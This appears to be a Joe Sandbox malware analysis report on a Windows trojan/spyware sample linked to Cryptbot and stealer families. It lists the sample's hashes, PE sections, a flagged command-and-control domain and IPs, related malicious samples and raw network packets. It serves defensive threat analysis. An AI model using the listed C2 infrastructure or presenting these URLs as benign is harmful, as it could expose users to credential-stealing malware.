http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322963100%Avira URL Cloudmalware

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
home.twentytk20pn.top
194.87.47.113
truefalse
    		high
    httpbin.org
    		98.85.100.80
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322false
        		high
        https://httpbin.org/ipfalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://curl.se/docs/hsts.htmlCc8zEnIDB2.exe, 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpfalse
            		high
            http://html4/loose.dtdCc8zEnIDB2.exe, 00000000.00000003.1302588655.000000000730F000.00000004.00001000.00020000.00000000.sdmp, Cc8zEnIDB2.exe, 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpfalse
              		high
              https://curl.se/docs/alt-svc.html#Cc8zEnIDB2.exefalse
                		high
                https://httpbin.org/ipbeforeCc8zEnIDB2.exe, 00000000.00000003.1302588655.000000000730F000.00000004.00001000.00020000.00000000.sdmp, Cc8zEnIDB2.exe, 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpfalse
                  		high
                  https://curl.se/docs/http-cookies.htmlCc8zEnIDB2.exe, Cc8zEnIDB2.exe, 00000000.00000003.1302588655.000000000730F000.00000004.00001000.00020000.00000000.sdmp, Cc8zEnIDB2.exe, 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpfalse
                    		high
                    https://curl.se/docs/hsts.html#Cc8zEnIDB2.exefalse
                      		high
                      https://curl.se/docs/http-cookies.html#Cc8zEnIDB2.exefalse
                        		high
                        https://curl.se/docs/alt-svc.htmlCc8zEnIDB2.exe, 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpfalse
                          		high
                          http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnY322Cc8zEnIDB2.exe, 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpfalse
                            		high
                            http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322963Cc8zEnIDB2.exe, 00000000.00000003.1385943438.0000000001882000.00000004.00000020.00020000.00000000.sdmp, Cc8zEnIDB2.exe, 00000000.00000002.1396667628.0000000001885000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            http://.cssCc8zEnIDB2.exe, 00000000.00000003.1302588655.000000000730F000.00000004.00001000.00020000.00000000.sdmp, Cc8zEnIDB2.exe, 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpfalse
                              		high
                              http://.jpgCc8zEnIDB2.exe, 00000000.00000003.1302588655.000000000730F000.00000004.00001000.00020000.00000000.sdmp, Cc8zEnIDB2.exe, 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpfalse
                                		high
                                http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322http://home.twentytk20pn.top/WEIsmPfDcpBFCc8zEnIDB2.exe, 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                98.85.100.80
                                		httpbin.orgUnited States
                                		11351TWC-11351-NORTHEASTUSfalse
                                194.87.47.113
                                		home.twentytk20pn.topRussian Federation
                                		49392ASBAXETNRUfalse

                                General Information

                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1578071
                                Start date and time:2024-12-19 08:32:33 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 4m 3s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:3
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:Cc8zEnIDB2.exe
                                renamed because original name is a hash value
                                Original Sample Name:a0d6c9d4d75289ffa8f7dbda90e3fce6.exe
                                Detection:MAL
                                Classification:mal100.troj.spyw.evad.winEXE@1/0@6/2
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 51%
                                • Number of executed functions: 108
                                • Number of non-executed functions: 49
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Stop behavior analysis, all processes terminated

                                Warnings

                                • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
                                • Excluded IPs from analysis (whitelisted): 13.107.246.63
                                • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com
                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                02:33:35API Interceptor3x Sleep call for process: Cc8zEnIDB2.exe modified

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                98.85.100.80Sh2uIqqKqc.exeGet hashmaliciousCryptbotBrowse
                                  rJvOqHxkuI.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                      NVkyG9HAeY.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                        W6seF0MjGW.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                          f1842FwKth.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                            aweqG2ssAY.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                              vH7JfdNi3c.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                U6mwWZlkzH.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                  KzLv0EXDs1.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    194.87.47.113rJvOqHxkuI.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                    • home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
                                                    NWKk493xTy.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
                                                    88S3zQTYpl.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
                                                    NVkyG9HAeY.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    httpbin.orgSh2uIqqKqc.exeGet hashmaliciousCryptbotBrowse
                                                    • 98.85.100.80
                                                    rJvOqHxkuI.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 98.85.100.80
                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                    • 98.85.100.80
                                                    NWKk493xTy.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 34.226.108.155
                                                    88S3zQTYpl.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 34.226.108.155
                                                    NVkyG9HAeY.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 98.85.100.80
                                                    W6seF0MjGW.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 98.85.100.80
                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                    • 34.226.108.155
                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, StealcBrowse
                                                    • 34.226.108.155
                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XmrigBrowse
                                                    • 98.85.100.80
                                                    home.twentytk20pn.toprJvOqHxkuI.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 194.87.47.113
                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                    • 194.87.47.113
                                                    NWKk493xTy.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 194.87.47.113
                                                    88S3zQTYpl.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 194.87.47.113
                                                    NVkyG9HAeY.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 194.87.47.113
                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, StealcBrowse
                                                    • 185.185.71.170
                                                    aweqG2ssAY.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 185.185.71.170
                                                    EnoSY3z6MP.exeGet hashmaliciousCryptbotBrowse
                                                    • 185.185.71.170
                                                    vH7JfdNi3c.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 185.185.71.170
                                                    JiZQEd33mn.exeGet hashmaliciousUnknownBrowse
                                                    • 185.185.71.170

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    TWC-11351-NORTHEASTUSSh2uIqqKqc.exeGet hashmaliciousCryptbotBrowse
                                                    • 98.85.100.80
                                                    rJvOqHxkuI.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 98.85.100.80
                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                    • 98.85.100.80
                                                    NVkyG9HAeY.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 98.85.100.80
                                                    W6seF0MjGW.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 98.85.100.80
                                                    f1842FwKth.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 98.85.100.80
                                                    aweqG2ssAY.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 98.85.100.80
                                                    vH7JfdNi3c.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 98.85.100.80
                                                    U6mwWZlkzH.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 98.85.100.80
                                                    KzLv0EXDs1.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 98.85.100.80
                                                    ASBAXETNRUrJvOqHxkuI.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 194.87.47.113
                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                    • 194.87.47.113
                                                    NWKk493xTy.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 194.87.47.113
                                                    88S3zQTYpl.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 194.87.47.113
                                                    NVkyG9HAeY.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 194.87.47.113
                                                    17345062850621022e2a034193497843f70f72ad0e2a6d5b0e23bb6cd0de4c41fac1759029833.dat-decoded.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                    • 45.135.232.38
                                                    H6Lzd3cP3H.exeGet hashmaliciousUnknownBrowse
                                                    • 194.87.47.99
                                                    k4c3YnjoBr.exeGet hashmaliciousCryptbotBrowse
                                                    • 194.87.47.99
                                                    1SzdrH2oTL.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 194.87.47.99
                                                    b3astmode.arm5.elfGet hashmaliciousMiraiBrowse
                                                    • 91.193.216.252

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    No created / dropped files found

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                    Entropy (8bit):7.9844420719493145
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • VXD Driver (31/22) 0.00%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:Cc8zEnIDB2.exe
                                                    File size:4'430'848 bytes
                                                    MD5:a0d6c9d4d75289ffa8f7dbda90e3fce6
                                                    SHA1:3e3b99a9b625fbd216908a07754adab568dbef4d
                                                    SHA256:ca737deb8d7b8dc261e6dd95dd42d7316e670d886023a7e4369df4a518c972ce
                                                    SHA512:e77bf7e82acdc1bf647a5a4761db39cdf591d45d9ef57457aafbb9a087bbca9988c79be7376a7268d4642db2cbef2a41ff723c907bf04cf00f1fdc06e1982858
                                                    SSDEEP:98304:j3ClGO5IimEwYIgsw7swMl6NFGS1DsZC2zm/hzB2hP:LCzILKtsw7sT6NcSr2zm/DG
                                                    TLSH:672633DA3913B1D6C90F3DB73B53C0712B61A7B36C7BAAA1A5DD893611B6C94334208D
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....U`g...............(.>D...d..2...........PD...@.................................{.C...@... ............................

                                                    File Icon

                                                    Icon Hash:90cececece8e8eb0

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0xf4b000
                                                    Entrypoint Section:.taggant
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                    DLL Characteristics:DYNAMIC_BASE
                                                    Time Stamp:0x676055E0 [Mon Dec 16 16:31:28 2024 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                    Entrypoint Preview

                                                    Instruction
                                                    jmp 00007F43E8828E5Ah

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x61905f0x73.idata
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x6180000x2b0.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xb48db40x10sgmjipkl
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0xb48d640x18sgmjipkl
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    0x10000x6170000x283e001660f83a8e0675c06e505b9a35d3bef5unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .rsrc0x6180000x2b00x200d4eb0a728e2294c02d37f125f17428b1False0.796875data6.043817593037624IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .idata 0x6190000x10000x200e8fbf92e0939d0cd4935f0fe539e974dFalse0.166015625data1.1763897754724144IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    0x61a0000x37d0000x200fbf814409299924205ce0cbfb2dec4d2unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    sgmjipkl0x9970000x1b30000x1b220079f2353f3f24750b2aec867f03361ab8False0.994249163187446data7.954959217473626IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    pwaltzxf0xb4a0000x10000x400a9245d2a7ac67f29b927be4dcd3cdefdFalse0.8203125data6.337828414770522IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .taggant0xb4b0000x30000x2200417f892b28c075b09b339a60aa67dce7False0.056870404411764705DOS executable (COM)0.7491515023128327IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                    Resources

                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                    RT_MANIFEST0xb48dc40x256ASCII text, with CRLF line terminators0.5100334448160535

                                                    Imports

                                                    DLLImport
                                                    kernel32.dlllstrcpy

                                                    Network Behavior

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Dec 19, 2024 08:33:32.145123959 CET49703443192.168.2.1098.85.100.80
                                                    Dec 19, 2024 08:33:32.145170927 CET4434970398.85.100.80192.168.2.10
                                                    Dec 19, 2024 08:33:32.145253897 CET49703443192.168.2.1098.85.100.80
                                                    Dec 19, 2024 08:33:32.159220934 CET49703443192.168.2.1098.85.100.80
                                                    Dec 19, 2024 08:33:32.159261942 CET4434970398.85.100.80192.168.2.10
                                                    Dec 19, 2024 08:33:33.899949074 CET4434970398.85.100.80192.168.2.10
                                                    Dec 19, 2024 08:33:33.910361052 CET49703443192.168.2.1098.85.100.80
                                                    Dec 19, 2024 08:33:33.910392046 CET4434970398.85.100.80192.168.2.10
                                                    Dec 19, 2024 08:33:33.914108038 CET4434970398.85.100.80192.168.2.10
                                                    Dec 19, 2024 08:33:33.914201021 CET49703443192.168.2.1098.85.100.80
                                                    Dec 19, 2024 08:33:33.915527105 CET49703443192.168.2.1098.85.100.80
                                                    Dec 19, 2024 08:33:33.915668964 CET49703443192.168.2.1098.85.100.80
                                                    Dec 19, 2024 08:33:33.915689945 CET4434970398.85.100.80192.168.2.10
                                                    Dec 19, 2024 08:33:33.961419106 CET49703443192.168.2.1098.85.100.80
                                                    Dec 19, 2024 08:33:33.961452961 CET4434970398.85.100.80192.168.2.10
                                                    Dec 19, 2024 08:33:34.008202076 CET49703443192.168.2.1098.85.100.80
                                                    Dec 19, 2024 08:33:34.235872030 CET4434970398.85.100.80192.168.2.10
                                                    Dec 19, 2024 08:33:34.236015081 CET4434970398.85.100.80192.168.2.10
                                                    Dec 19, 2024 08:33:34.236100912 CET49703443192.168.2.1098.85.100.80
                                                    Dec 19, 2024 08:33:34.294707060 CET49703443192.168.2.1098.85.100.80
                                                    Dec 19, 2024 08:33:34.294743061 CET4434970398.85.100.80192.168.2.10
                                                    Dec 19, 2024 08:33:35.321482897 CET4970980192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:35.441152096 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:35.441317081 CET4970980192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:35.442362070 CET4970980192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:35.562288046 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:35.562336922 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:35.562393904 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:35.562422991 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:35.562428951 CET4970980192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:35.562465906 CET4970980192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:35.562508106 CET4970980192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:35.562585115 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:35.562640905 CET4970980192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:35.562665939 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:35.562736034 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:35.562747002 CET4970980192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:35.562764883 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:35.562792063 CET4970980192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:35.562819004 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:35.562825918 CET4970980192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:35.562848091 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:35.562975883 CET4970980192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:35.682229996 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:35.682324886 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:35.682357073 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:35.682358027 CET4970980192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:35.682385921 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:35.682389975 CET4970980192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:35.682405949 CET4970980192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:35.682434082 CET4970980192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:35.682440042 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:35.682468891 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:35.682499886 CET4970980192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:35.682542086 CET4970980192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:35.725123882 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:35.725224972 CET4970980192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:35.850951910 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:35.851028919 CET4970980192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:35.888957977 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:35.889034986 CET4970980192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:36.008641958 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.011194944 CET4970980192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:36.188986063 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.191340923 CET4970980192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:36.425293922 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.425714016 CET4970980192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:36.441957951 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.442178965 CET4970980192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:36.442250967 CET4970980192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:36.545316935 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.552814960 CET4970980192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:36.562540054 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.562570095 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.562589884 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.562681913 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.562690020 CET4970980192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:36.562726974 CET4970980192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:36.562782049 CET4970980192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:36.562828064 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.562868118 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.562911987 CET4970980192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:36.563028097 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.563038111 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.563092947 CET4970980192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:36.563126087 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.563134909 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.563189030 CET4970980192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:36.563200951 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.563288927 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.563334942 CET4970980192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:36.563391924 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.563590050 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.563632965 CET4970980192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:36.563730955 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.563827991 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.563985109 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.563994884 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.564080000 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.564121008 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.564207077 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.564220905 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.564342976 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.564387083 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.564471960 CET4970980192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:36.564512014 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.564552069 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.564594030 CET4970980192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:36.564611912 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.564671040 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.564681053 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.564716101 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.564721107 CET4970980192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:36.564757109 CET4970980192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:36.564785957 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.564824104 CET4970980192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:36.566780090 CET4970980192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:36.604897022 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.606658936 CET4970980192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:36.672636986 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.676618099 CET4970980192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:36.682485104 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.682523012 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.682605982 CET4970980192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:36.682665110 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.682737112 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.682885885 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.683046103 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.683099031 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.683228970 CET8049709194.87.47.113192.168.2.10
